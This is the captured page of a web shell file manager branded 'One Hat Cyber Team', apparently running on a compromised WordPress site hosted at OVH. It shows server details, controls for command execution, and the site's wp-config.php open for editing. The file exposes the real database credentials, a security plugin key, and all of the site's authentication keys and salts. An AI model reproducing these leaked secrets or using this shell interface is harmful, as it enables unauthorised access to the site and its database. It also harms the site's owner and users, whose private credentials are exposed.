⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.30
Server IP:
92.222.139.190
Server:
Linux webd002.cluster128.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
mspfmsm
/
blogbmft
/
Edit File: wp-config.php
<?php define('WP_CACHE', true); // WP-Optimize Cache //Begin Really Simple Security session cookie settings @ini_set('session.cookie_httponly', true); @ini_set('session.cookie_secure', true); @ini_set('session.use_only_cookies', true); //END Really Simple Security cookie settings //Begin Really Simple Security key define('RSSSL_KEY', 'LcNRiJj5vr4d4yUIZtku4YBS14SviJ7rfYzRZPkOfOE4iVOtphzp1MaQCokDGh3y'); //END Really Simple Security key /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/documentation/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'mspfmsmadriana' ); /** Database username */ define( 'DB_USER', 'mspfmsmadriana' ); /** Database password */ define( 'DB_PASSWORD', 'Adriana94MxT' ); /** Database hostname */ define( 'DB_HOST', 'mspfmsmadriana.mysql.db' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); define('DISALLOW_FILE_EDIT', false); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', '!;16.U4;dbr7?};:VFKx4Dj:$Q#.E,7q:mgBrEX vV:4GL/O2!zL!rDR@8H_a;Uz' ); define( 'SECURE_AUTH_KEY', '|%rChhB]6;{=R459gCHn&AdmO4$>Hihd&CV<9nWGUL#W+ti`s 6RJ+Hv.xYa/BI%' ); define( 'LOGGED_IN_KEY', 'F,=Y>@jqc{b92N)Zek8zD#[bF`8%%[Ng2#2h{k-,x:<R6||P=&mb9`Sp-oE3ee&>' ); define( 'NONCE_KEY', 'DL+._7eucN5xL5{dQHER7Xe]`Q]*MZZ++T2%6gDBqJ@TBjxEDwI#jc!LI.f(#WYI' ); define( 'AUTH_SALT', '|tU`-s?lt?}/rt4hMo}>(+}n!7{?ko23J_-(_J^$Gp/82PWaG3Gqua!#@c(=^/:X' ); define( 'SECURE_AUTH_SALT', '2c?&ml-Xzf25o2|T3#~oA|G&^#!I>oBw^I*!zM_dE^maBIZK*=F7sX<txC^EOx(B' ); define( 'LOGGED_IN_SALT', 'cWYo3gT!?1#eA+uO>SiR}rkLbh@lmBJ+!tk =nsw:/v,O!u-~ldmCT8(AP[?#sP]' ); define( 'NONCE_SALT', 'UDro)vMJkK2znSOM.]R@NLgnz-#@fxCB5(O;zHx|*Qjt%UNmjV<J @ tgn2Xgk0E' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'bmft_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/documentation/article/debugging-in-wordpress/ */ define('WP_DEBUG', false); define('WP_DEBUG_DISPLAY', false); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Simpan